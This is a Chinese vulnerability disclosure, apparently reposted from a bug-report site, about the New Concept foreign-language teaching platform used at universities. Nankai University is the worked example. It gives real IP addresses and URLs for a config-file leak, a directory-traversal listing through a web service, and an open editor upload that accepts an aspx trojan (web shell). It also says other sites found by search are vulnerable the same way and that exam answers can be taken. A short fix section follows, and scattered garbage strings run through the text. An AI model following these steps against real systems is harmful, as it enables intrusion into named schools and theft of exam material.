新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
# Y; ~( n% i* T1 E0 q: p1 _8 D  Z
以南开大学的为例:
7 }# J8 j* |1 ]5 R4 ohttp://222.30.60.3/NPELS
+ ~6 R* c! W) Z6 qNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
. R& z+ ~7 P: q7 v; M5 p<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
" U: l  L8 M6 _* E* S) N, x$ |</setting>
及版本号
' C, X) z* _0 M' m# U% p<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
2 ]1 M1 u( |) G9 d7 ^使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 A* u( P; o9 Z5 D! u* H; O
发现
! E( {% m; ^$ M# j# \6 qhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
( g, S) f& T( l5 [$ H3 M可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
' ~9 I9 D; e8 S& h& m; Y上传后继续列目录找到木马地址直接访问即可

OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
3 t0 V0 J" m1 h$ E. @漏洞证明：
3 Z0 i) U: p- ?" L1 z8 k
9 p7 Q) ^) [9 V% y& r) o列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
; B6 h" C' y8 p& q3 `9 Zhttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
  f  C/ \, v: l  O% U8 _http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
# J! D+ d6 P3 C0 h$ P* g/ D9 _
修复方案：
% ^0 G+ @: R# {# Y3 g! {/ U2 {好像考试系统必须使用 CommonService.asmx
7 \, B1 @7 f- ]6 y) a* x- S, ]最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
. a% N- t, _  ]% t